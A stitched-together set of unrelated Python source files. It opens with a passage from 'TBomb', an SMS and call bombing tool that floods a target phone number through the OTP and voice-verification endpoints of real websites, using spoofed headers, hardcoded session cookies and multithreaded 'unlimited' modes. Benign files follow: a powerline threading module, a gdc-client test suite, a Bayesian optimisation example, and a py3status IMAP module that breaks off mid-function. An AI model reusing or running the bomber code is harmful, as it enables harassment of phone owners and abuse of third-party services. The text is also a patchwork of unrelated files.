rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
return rd.lower().find("y") != -1
elif lim == 103:
os.system(
'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
return True
elif lim == 104:
rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read().decode('utf-8')
return rd.lower().strip().find('callmade') != -1
elif lim == 106:
rd = os.popen(
'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
return rd.find("1") != -1
return False
def remsp(num):
num = num.replace(' ', '')
num = num.replace('-', '')
return num
def start(target, counter, delay, ch, cc):
clr()
banner()
failed = 0
requested = 0
success = int(requested) - int(failed)
bombs = int(counter) + 1
while success < (int(bombs)):
os.system('clear')
banner()
try:
api = random.choice(ch)
except Exception:
if cc == "91":
print('Sorry All APIs Have Expired Please Update TBomb')
input('Press Enter To Exit...')
exit()
else:
if success > 0:
print(
'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
print(
'\nWe Are Working Too Hard To Increase The International Limit...')
input(
'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
os.system('rm *.xxx* > /dev/null 2>&1')
print('\n\n')
banner()
exit()
else:
print('\n\n\tSorry Your Country is Not Supported...')
print(
'\t\tPlease Send A Mail To ggspeedx29@gmail.com To Let Us Know...')
input('Press Enter To Exit...')
exit()
print(random.choice(colors))
print("==================================================================")
print(" BOMBING in progress, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +" + str(cc) + " ", target)
print(" Number of Requests Sent : ", requested)
print(" Successful Requests : ", success)
print(" Failed Requests : ", failed)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
try:
result = getapi(target, api, cc)
except Exception:
result = False
requested = requested + 1
if result:
success = success + 1
else:
failed = failed + 1
while ch.count(api) > 0:
ch.remove(api)
time.sleep(float(delay))
if requested % 3 == 0:
checkinternet()
print(W)
print('\n\nBombing Completed..')
os.system('rm *.xxx* > /dev/null 2>&1')
banner()
exit()
def update():
stuff_to_update = ['bomber.py', '.version']
for fl in stuff_to_update:
dat = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/" + fl).read()
file = open(fl, 'wb')
file.write(dat)
file.close()
print('\n\t\tUpdated Successfull !!!!')
print('\tPlease Run The Script Again...')
exit()
clr()
banner()
try:
urllib.request.urlopen('https://www.google.com')
except Exception:
print("You are not connected To Internet!!!")
print("\tPlease Connect To Internet To Continue...\n")
input('Exiting....\n Press Enter To Continue....')
exit()
print('\tChecking For Updates...')
ver = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.version").read().decode('utf-8')
verl = ''
try:
verl = open(".version", 'r').read()
except Exception:
pass
if ver != verl:
print('\n\t\tAn Update is Available....')
print('\tStarting Update...')
update()
print("Your Version is Up-To-Date")
print('\n\n\t\t\tStarting TBomb...\n\n')
try:
noti = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.notify").read().decode('utf-8')
noti = noti.upper().strip()
if len(noti) > 10:
print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception:
pass
while True:
pn = ""
cc = input("\tEnter Your Country Code (Without +) : ")
if '+' in cc:
tc = list(cc)
tc.remove('+')
cc = ''.join(tc)
cc = cc.strip()
pn = input("\tEnter Target Number: +" + cc + " ")
pn = remsp(pn)
if len(cc) >= 4 or len(cc) < 1:
print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
continue
if len(pn) <= 6:
print('\n\nInvalid Phone Number..\n')
continue
for cch in str(cc + pn):
if not cch.isdigit():
print('\n\nPhone Number Must Consist Of Numbers Only\n')
continue
break
type = 0
try:
if sys.argv[1] == "call":
type = 1
except Exception:
type = 0
if type == 1:
nm = int(input("Enter Number of Calls To Send(Maximum 15): "))
if nm > 15:
print("\t\tYou Have Entered " + str(nm) +
".\n\tNormalizing Value To 15")
nm = 15
dl = float(input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
elif type == 0:
if cc == "91":
nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 2 sec ] : "))
else:
nm = int(input("Enter Number of Messages To Send: "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
maxlim = 0
if cc == "91":
maxlim = 500
else:
maxlim = 100
if nm > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
print('Number Of SMS Has been Set To ' + str(maxlim))
nm = maxlim
if not cc.strip() == "91":
if type == 1:
print(
'\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
print()
input('Press Enter To Exit....')
print('\n\n')
banner()
exit()
cnt = 0
if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
ch = [0, 14, 15, 16]
start(pn, nm, dl, ch, str(cc))
exit()
ch = [i for i in range(17)]
cbomb = False
if pn.strip() == '' or dl <= 0 or nm < 0:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
if type == 1:
print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
cbomb = True
if cbomb:
chl = [100, 101, 102, 103, 104, 105, 106]
start(pn, nm, dl, chl, str(cc))
exit()
if nm == 0:
nt = int(input("\tNumber Of Threads(10 to 20) : "))
if nt <= 0 or nt >= 30:
print('\tTBomb Shows Better Result in 10 to 25 Threads\n\t\tStill Continuing....')
print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
t = [None] * nt
print(random.choice(colors))
print("\n\n==================================================================")
print(" Gearing Up Bomber, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +91", pn)
print(" Number of Threads : ", nt)
print(" Delay : ", dl)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By Technical Yusuf !! ")
print("==================================================================")
print(W)
input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
os.system('rm *.xxx* > /dev/null 2>&1')
print("\n\nStarting Bomb....")
for i in range(nt):
t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
t[i].daemon = True
t[i].start()
time.sleep(2)
ci = 0
while True:
ci += 1
l = count_inf
print(" Total Number of Requests Sent : ", l)
if int(l) > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
input('Press Enter To Exit...')
os.system('rm *xxx* > /dev/null 2>&1')
banner()
exit()
time.sleep(1)
if ci % 3 == 0:
checkinternet()
else:
start(pn, nm, dl, ch, '91')
exit()
|
threaded.py
|
# vim:fileencoding=utf-8:noet
from __future__ import absolute_import
from powerline.lib.monotonic import monotonic
from threading import Thread, Lock, Event
class MultiRunnedThread(object):
daemon = True
def __init__(self):
self.thread = None
def is_alive(self):
return self.thread and self.thread.is_alive()
def start(self):
self.shutdown_event.clear()
self.thread = Thread(target=self.run)
self.thread.daemon = self.daemon
self.thread.start()
def join(self, *args, **kwargs):
if self.thread:
return self.thread.join(*args, **kwargs)
return None
class ThreadedSegment(MultiRunnedThread):
min_sleep_time = 0.1
update_first = True
interval = 1
daemon = False
def __init__(self):
super(ThreadedSegment, self).__init__()
self.run_once = True
self.crashed = False
self.crashed_value = None
self.update_value = None
self.updated = False
def __call__(self, pl, update_first=True, **kwargs):
if self.run_once:
self.pl = pl
self.set_state(**kwargs)
update_value = self.get_update_value(True)
elif not self.is_alive():
# Without this we will not have to wait long until receiving bug “I
# opened vim, but branch information is only shown after I move
# cursor”.
#
# If running once .update() is called in __call__.
self.start()
update_value = self.get_update_value(self.do_update_first)
else:
update_value = self.get_update_value(not self.updated)
if self.crashed:
return self.crashed_value
return self.render(update_value, update_first=update_first, pl=pl, **kwargs)
def set_update_value(self):
try:
self.update_value = self.update(self.update_value)
except Exception as e:
self.exception('Exception while updating: {0}', str(e))
self.crashed = True
except KeyboardInterrupt:
self.warn('Caught keyboard interrupt while updating')
self.crashed = True
else:
self.crashed = False
self.updated = True
def get_update_value(self, update=False):
if update:
self.set_update_value()
return self.update_value
def run(self):
if self.do_update_first:
start_time = monotonic()
while True:
self.shutdown_event.wait(max(self.interval - (monotonic() - start_time), self.min_sleep_time))
if self.shutdown_event.is_set():
break
start_time = monotonic()
self.set_update_value()
else:
while not self.shutdown_event.is_set():
start_time = monotonic()
self.set_update_value()
self.shutdown_event.wait(max(self.interval - (monotonic() - start_time), self.min_sleep_time))
def shutdown(self):
self.shutdown_event.set()
if self.daemon and self.is_alive():
# Give the worker thread a chance to shutdown, but don't block for
# too long
self.join(0.01)
def set_interval(self, interval=None):
# Allowing “interval” keyword in configuration.
# Note: Here **kwargs is needed to support foreign data, in subclasses
# it can be seen in a number of places in order to support
# .set_interval().
interval = interval or getattr(self, 'interval')
self.interval = interval
def set_state(self, interval=None, update_first=True, shutdown_event=None, **kwargs):
self.set_interval(interval)
self.shutdown_event = shutdown_event or Event()
self.do_update_first = update_first and self.update_first
self.updated = self.updated or (not self.do_update_first)
def startup(self, pl, **kwargs):
self.run_once = False
self.pl = pl
self.daemon = pl.use_daemon_threads
self.set_state(**kwargs)
if not self.is_alive():
self.start()
def critical(self, *args, **kwargs):
self.pl.critical(prefix=self.__class__.__name__, *args, **kwargs)
def exception(self, *args, **kwargs):
self.pl.exception(prefix=self.__class__.__name__, *args, **kwargs)
def info(self, *args, **kwargs):
self.pl.info(prefix=self.__class__.__name__, *args, **kwargs)
def error(self, *args, **kwargs):
self.pl.error(prefix=self.__class__.__name__, *args, **kwargs)
def warn(self, *args, **kwargs):
self.pl.warn(prefix=self.__class__.__name__, *args, **kwargs)
def debug(self, *args, **kwargs):
self.pl.debug(prefix=self.__class__.__name__, *args, **kwargs)
class KwThreadedSegment(ThreadedSegment):
update_first = True
def __init__(self):
super(KwThreadedSegment, self).__init__()
self.updated = True
self.update_value = ({}, set())
self.write_lock = Lock()
self.new_queries = []
@staticmethod
def key(**kwargs):
return frozenset(kwargs.items())
def render(self, update_value, update_first, key=None, after_update=False, **kwargs):
queries, crashed = update_value
if key is None:
key = self.key(**kwargs)
if key in crashed:
return self.crashed_value
try:
update_state = queries[key][1]
except KeyError:
with self.write_lock:
self.new_queries.append(key)
if self.do_update_first or self.run_once:
if after_update:
self.error('internal error: value was not computed even though update_first was set')
update_state = None
else:
return self.render(
update_value=self.get_update_value(True),
update_first=False,
key=key,
after_update=True,
**kwargs
)
else:
update_state = None
return self.render_one(update_state, **kwargs)
def update_one(self, crashed, updates, key):
try:
updates[key] = (monotonic(), self.compute_state(key))
except Exception as e:
self.exception('Exception while computing state for {0!r}: {1}', key, str(e))
crashed.add(key)
except KeyboardInterrupt:
self.warn('Interrupt while computing state for {0!r}', key)
crashed.add(key)
def update(self, old_update_value):
updates = {}
crashed = set()
update_value = (updates, crashed)
queries = old_update_value[0]
new_queries = self.new_queries
with self.write_lock:
self.new_queries = []
for key, (last_query_time, state) in queries.items():
if last_query_time < monotonic() < last_query_time + self.interval:
updates[key] = (last_query_time, state)
else:
self.update_one(crashed, updates, key)
for key in new_queries:
self.update_one(crashed, updates, key)
return update_value
def set_state(self, interval=None, update_first=True, shutdown_event=None, **kwargs):
self.set_interval(interval)
self.do_update_first = update_first and self.update_first
self.shutdown_event = shutdown_event or Event()
@staticmethod
def render_one(update_state, **kwargs):
return update_state
def with_docstring(instance, doc):
instance.__doc__ = doc
return instance
|
test_download_client.py
|
import copy
from multiprocessing import Process, cpu_count
import os
import os.path
import pytest
import tarfile
import tempfile
import time
from unittest import TestCase
from gdc_client.parcel.const import HTTP_CHUNK_SIZE, SAVE_INTERVAL
from gdc_client.parcel.download_stream import DownloadStream
import mock_server
from conftest import make_tarfile, md5, uuids
from gdc_client.download.client import GDCHTTPDownloadClient, fix_url
from gdc_client.query.index import GDCIndexClient
# default values for flask
server_host = "http://127.0.0.1"
server_port = "5000"
# same as --server flag for gdc-client
base_url = server_host + ":" + server_port
client_kwargs = {
"token": "valid token",
"n_procs": min(cpu_count(), 8),
"directory": ".",
"segment_md5sums": True,
"file_md5sum": True,
"debug": True,
"http_chunk_size": HTTP_CHUNK_SIZE,
"save_interval": SAVE_INTERVAL,
"download_related_files": True,
"download_annotations": True,
"no_auto_retry": True,
"retry_amount": 5,
"verify": True,
}
class DownloadClientTest(TestCase):
def setUp(self):
self.server = Process(target=mock_server.app.run)
self.server.start()
# give the server time to start
time.sleep(2)
def tearDown(self):
self.server.terminate()
self.server.join()
def test_fix_url(self):
index_client = GDCIndexClient(base_url)
client = GDCHTTPDownloadClient(
uri=base_url, index_client=index_client, **client_kwargs
)
assert fix_url("api.gdc.cancer.gov") == "https://api.gdc.cancer.gov/"
assert fix_url("http://api.gdc.cancer.gov/") == "http://api.gdc.cancer.gov/"
assert fix_url("api.gdc.cancer.gov/") == "https://api.gdc.cancer.gov/"
def test_untar_file(self):
files_to_tar = ["small", "small_ann", "small_rel", "small_no_friends"]
tarfile_name = make_tarfile(files_to_tar)
index_client = GDCIndexClient(base_url)
client = GDCHTTPDownloadClient(
uri=base_url, index_client=index_client, **client_kwargs
)
client._untar_file(tarfile_name)
for f in files_to_tar:
assert os.path.exists(f)
os.remove(f)
def test_md5_members(self):
files_to_tar = ["small", "small_ann", "small_rel", "small_no_friends"]
tarfile_name = make_tarfile(files_to_tar)
index_client = GDCIndexClient(base_url)
index_client._get_metadata(files_to_tar)
client = GDCHTTPDownloadClient(
uri=base_url, index_client=index_client, **client_kwargs
)
client._untar_file(tarfile_name)
errors = client._md5_members(files_to_tar)
assert errors == []
for f in files_to_tar:
os.path.exists(f)
os.remove(f)
def test_download_tarfile(self):
# this is done after the small file sorting happens,
# so pick UUIDs that would be grouped together
files_to_dl = ["small_no_friends"]
index_client = GDCIndexClient(base_url)
index_client._get_metadata(files_to_dl)
client = GDCHTTPDownloadClient(
uri=base_url, index_client=index_client, **client_kwargs
)
# it will remove redundant uuids
tarfile_name, errors = client._download_tarfile(files_to_dl)
assert tarfile_name != None
assert os.path.exists(tarfile_name)
assert tarfile.is_tarfile(tarfile_name) == True
with tarfile.open(tarfile_name, "r") as t:
for member in t.getmembers():
m = t.extractfile(member)
contents = m.read()
assert contents.decode("utf-8") == uuids[member.name]["contents"]
os.remove(tarfile_name)
def test_download_annotations(self):
# uuid of file that has an annotation
files_to_dl = ["small_ann"]
# get annotation id out of metadata
index_client = GDCIndexClient(base_url)
index_client._get_metadata(files_to_dl)
# set expected output path for download client
with tempfile.TemporaryDirectory() as tmpdirname:
override_kwargs = copy.deepcopy(client_kwargs)
override_kwargs["directory"] = tmpdirname
# where we expect annotations to be written
os.mkdir(tmpdirname + "/{}".format(files_to_dl[0]))
output_path = tmpdirname + "/{}/annotations.txt".format(files_to_dl[0])
client = GDCHTTPDownloadClient(
uri=base_url, index_client=index_client, **override_kwargs
)
# we mock the response from api, a gzipped tarfile with an annotations.txt in it
# this code will open that and write the annotations.txt to a particular path
# no return
client.download_annotations(files_to_dl[0])
# verify
assert os.path.exists(output_path), "failed to write annotations file"
with open(output_path, "r") as f:
contents = f.read()
assert (
contents == uuids["annotations.txt"]["contents"]
), "annotations content incorrect"
@pytest.mark.parametrize("check_segments", (True, False))
def test_no_segment_md5sums_args(check_segments):
client_args = copy.deepcopy(client_kwargs)
client_args["segment_md5sums"] = check_segments
GDCHTTPDownloadClient(uri=base_url, index_client=None, **client_args)
assert DownloadStream.check_segment_md5sums is check_segments
|
async_optimization.py
|
import time
import random
from bayes_opt import BayesianOptimization
from bayes_opt.util import UtilityFunction, Colours
import asyncio
import threading
try:
import json
import tornado.ioloop
import tornado.httpserver
from tornado.web import RequestHandler
import requests
except ImportError:
raise ImportError(
"In order to run this example you must have the libraries: " +
"`tornado` and `requests` installed."
)
def black_box_function(x, y):
"""Function with unknown internals we wish to maximize.
This is just serving as an example, however, for all intents and
purposes think of the internals of this function, i.e.: the process
which generates its outputs values, as unknown.
"""
time.sleep(random.randint(1, 7))
return -x ** 2 - (y - 1) ** 2 + 1
class BayesianOptimizationHandler(RequestHandler):
"""Basic functionality for NLP handlers."""
_bo = BayesianOptimization(
f=black_box_function,
pbounds={"x": (-4, 4), "y": (-3, 3)}
)
_uf = UtilityFunction(kind="ucb", kappa=3, xi=1)
def post(self):
"""Deal with incoming requests."""
body = tornado.escape.json_decode(self.request.body)
try:
self._bo.register(
params=body["params"],
target=body["target"],
)
print("BO has registered: {} points.".format(len(self._bo.space)), end="\n\n")
except KeyError:
pass
finally:
suggested_params = self._bo.suggest(self._uf)
self.write(json.dumps(suggested_params))
def run_optimization_app():
asyncio.set_event_loop(asyncio.new_event_loop())
handlers = [
(r"/bayesian_optimization", BayesianOptimizationHandler),
]
server = tornado.httpserver.HTTPServer(
tornado.web.Application(handlers)
)
server.listen(9009)
tornado.ioloop.IOLoop.instance().start()
def run_optimizer():
global optimizers_config
config = optimizers_config.pop()
name = config["name"]
colour = config["colour"]
register_data = {}
max_target = None
for _ in range(10):
status = name + " wants to register: {}.\n".format(register_data)
resp = requests.post(
url="http://localhost:9009/bayesian_optimization",
json=register_data,
).json()
target = black_box_function(**resp)
register_data = {
"params": resp,
"target": target,
}
if max_target is None or target > max_target:
max_target = target
status += name + " got {} as target.\n".format(target)
status += name + " will to register next: {}.\n".format(register_data)
print(colour(status), end="\n")
global results
results.append((name, max_target))
print(colour(name + " is done!"), end="\n\n")
if __name__ == "__main__":
ioloop = tornado.ioloop.IOLoop.instance()
optimizers_config = [
{"name": "optimizer 1", "colour": Colours.red},
{"name": "optimizer 2", "colour": Colours.green},
{"name": "optimizer 3", "colour": Colours.blue},
]
app_thread = threading.Thread(target=run_optimization_app)
app_thread.daemon = True
app_thread.start()
targets = (
run_optimizer,
run_optimizer,
run_optimizer
)
optimizer_threads = []
for target in targets:
optimizer_threads.append(threading.Thread(target=target))
optimizer_threads[-1].daemon = True
optimizer_threads[-1].start()
results = []
for optimizer_thread in optimizer_threads:
optimizer_thread.join()
for result in results:
print(result[0], "found a maximum value of: {}".format(result[1]))
ioloop.stop()
|
imap.py
|
"""
Display number of unread messages from IMAP account.
Configuration parameters:
allow_urgent: display urgency on unread messages (default False)
auth_scope: scope to use with OAuth2 (default 'https://mail.google.com/')
auth_token: path to where the pickled access/refresh token will be saved
after successful credential authorization.
(default '~/.config/py3status/imap_auth_token.pickle')
cache_timeout: refresh interval for this module (default 60)
client_secret: the path to the client secret file with OAuth 2.0
credentials (if None then OAuth not used) (default None)
criterion: status of emails to check for (default 'UNSEEN')
debug: log warnings (default False)
degraded_when_stale: color as degraded when updating failed (default True)
format: display format for this module (default 'Mail: {unseen}')
hide_if_zero: hide this module when no new mail (default False)
mailbox: name of the mailbox to check (default 'INBOX')
password: login password (default None)
port: number to use (default '993')
read_timeout: timeout for read(2) syscalls (default 5)
security: login authentication method: 'ssl' or 'starttls'
(startssl needs python 3.2 or later) (default 'ssl')
server: server to connect (default None)
use_idle: use IMAP4 IDLE instead of polling; requires compatible
server; uses cache_timeout for IDLE's timeout; will auto detect
when set to None (default None)
user: login user (default None)
Format placeholders:
{unseen} number of unread emails
Color options:
color_new_mail: use color when new mail arrives, default to color_good
OAuth:
OAuth2 will be used for authentication instead of a password if the
client_secret path is set.
To create a client_secret for your Google account, visit
https://console.developers.google.com/ and create an "OAuth client ID" from
the credentials tab.
This client secret enables the app (in this case, the IMAP py3status module)
to request access to a user's email. Therefore the client secret doesn't
have to be for the same Google account as the email account being accessed.
When the IMAP module first tries to access your email account a browser
window will open asking for authorization to access your email.
After authorization is complete, an access/refresh token will be saved to
the path configured in auth_token.
Requires: Using OAuth requires the google-auth and google-auth-oauthlib
libraries to be installed.
Note: the same client secret file can be used as with the py3status Google
Calendar module.
@author obb, girst
SAMPLE OUTPUT
{'full_text': 'Mail: 36', 'color': '#00FF00'}
"""
import imaplib
import os
from threading import Thread
from time import sleep
from ssl import create_default_context
from socket import setdefaulttimeout, error as socket_error
STRING_UNAVAILABLE = "N/A"
NO_DATA_YET = -1
class Py3status:
"""
"""
# available configuration parameters
allow_urgent = False
auth_scope = "https://mail.google.com/"
auth_token = "~/.config/py3status/imap_auth_token.pickle"
cache_timeout = 60
client_secret = None
criterion = "UNSEEN"
debug = False
degraded_when_stale = True
format = "Mail: {unseen}"
hide_if_zero = False
mailbox = "INBOX"
password = None
port = "993"
read_timeout = 5
security = "ssl"
server = None
use_idle = None
user = None
class Meta:
deprecated = {
"rename": [
{
"param": "new_mail_color",
"new": "color_new_mail",
"msg": "obsolete parameter use `color_new_mail`",
},
{
"param": "imap_server",
"new": "server",
"msg": "obsolete parameter use `server`",
},
]
}
def post_config_hook(self):
# class variables:
self.mail_count = NO_DATA_YET
self.connection = None
self.mail_error = None # cannot throw self.py3.error from thread
self.network_error = None
self.command_tag = (
0 # IMAPcommands are tagged, so responses can be matched up to requests
)
self.idle_thread = Thread()
if self.client_secret:
self.client_secret = os.path.expanduser(self.client_secret)
self.auth_token = os.path.expanduser(self.auth_token)
if self.security not in ["ssl", "starttls"]:
raise ValueError("Unknown security protocol")
def imap(self):
# I -- acquire mail_count
if self.use_idle is not False:
if not self.idle_thread.is_alive():
sleep(
self.read_timeout
) # rate-limit thread-restarting (when network is offline)
self.idle_thread = Thread(target=self._get_mail_count)
self.idle_thread.daemon = True
self.idle_thread.start()
else:
self._get_mail_count()
response = {"cached_until": self.py3.time_in(self.cache_timeout)}
if self.mail_error is not None:
self.py3.log(self.mail_error, level=self.py3.LOG_ERROR)
self.py3.error(self.mail_error)
self.mail_error = None
# II -- format response
response["full_text"] = self.py3.safe_format(
self.format, {"unseen": self.mail_count}
)
if self.mail_count is None:
response["color"] = (self.py3.COLOR_BAD,)
response["full_text"] = self.py3.safe_format(
self.format, {"unseen": STRING_UNAVAILABLE}
)
elif self.mail_count == NO_DATA_YET:
response["full_text"] = ""
elif self.mail_count == 0 and self.hide_if_zero:
response["full_text"] = ""
elif self.mail_count > 0:
response["color"] = self.py3.COLOR_NEW_MAIL or self.py3.COLOR_GOOD
response["urgent"] = self.allow_urgent
if self.network_error is not None and self.degraded_when_stale:
response["color"] = self.py3.COLOR_DEGRADED
return response
def _check_if_idle(self, connection):
supports_idle = "IDLE" in connection.capabilities
self.use_idle = supports_idle
self.py3.log("Will use {}".format("idling" if self.use_idle else "polling"))
if self.use_idle and not supports_idle:
self.py3.error("Server does not support IDLE")
def _get_creds(self):
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.auth.exceptions import TransportError
import pickle
self.creds = None
# Open pickle file with access and refresh tokens if it exists
if os.path.exists(self.auth_token):
with open(self.auth_token, "rb") as token:
self.creds = pickle.load(token)
if not self.creds or not self.creds.valid:
try:
if self.creds and self.creds.expired and self.creds.refresh_token:
# Credentials expired but contain refresh token
self.creds.refresh(Request())
else:
# No valid credentials so open authorisation URL in browser
flow = InstalledAppFlow.from_client_secrets_file(
self.client_secret, [self.auth_scope]
)
self.creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(self.auth_token, "wb") as token:
pickle.dump(self.creds, token)
except TransportError as e:
# Treat the same as a socket_error
raise socket_error(e)
def _connection_ssl(self):
if self.client_secret:
# Use OAUTH
self._get_creds()
setdefaulttimeout(self.read_timeout)
connection = imaplib.IMAP4_SSL(self.server, int(self.port))
return connection
def _connection_starttls(self):
setdefaulttimeout(self.read_timeout)
connection = imaplib.IMAP4(self.server, int(self.port))
connection.starttls(create_default_context())
return connection
def _connect(self):
if self.security == "ssl":
self.connection = self._connection_ssl()
elif self.security == "starttls":
self.connection = self._connection_starttls()
if self.use_idle is None:
self._check_if_idle(self.connection)
# trigger a socket.timeout if any IMAP request isn't completed in time:
self.connection.socket().settimeout(self.read_timeout)
def _disconnect(self):
try:
if self.connection is not None:
if self.connection.state == "SELECTED":
self.connection.close()
self.connection.logout()
except: # noqa e722
pass
finally:
self.connection = None
def _idle(self):
"""
since imaplib doesn't support IMAP4r1 IDLE, we'll do it by hand
"""
socket = None
try:
# build a new command tag (Xnnn) as bytes:
self.command_tag = (self.command_tag + 1) % 1000
command_tag = b"X" + bytes(str(self.command_tag).zfill(3), "ascii")
# make sure we have selected anything before idling:
directories = self.mailbox.split(",")
self.connection.select(directories[0])
socket = self.connection.socket()
# send IDLE command and check response:
socket.write(command_tag + b" IDLE\r\n")
try:
response = socket.read(4096).decode("ascii")
except socket_error:
raise imaplib.IMAP4.abort("Server didn't respond to 'IDLE' in time")
# Dovecot will responde with "+ idling", courier will return "+ entering idle mode"
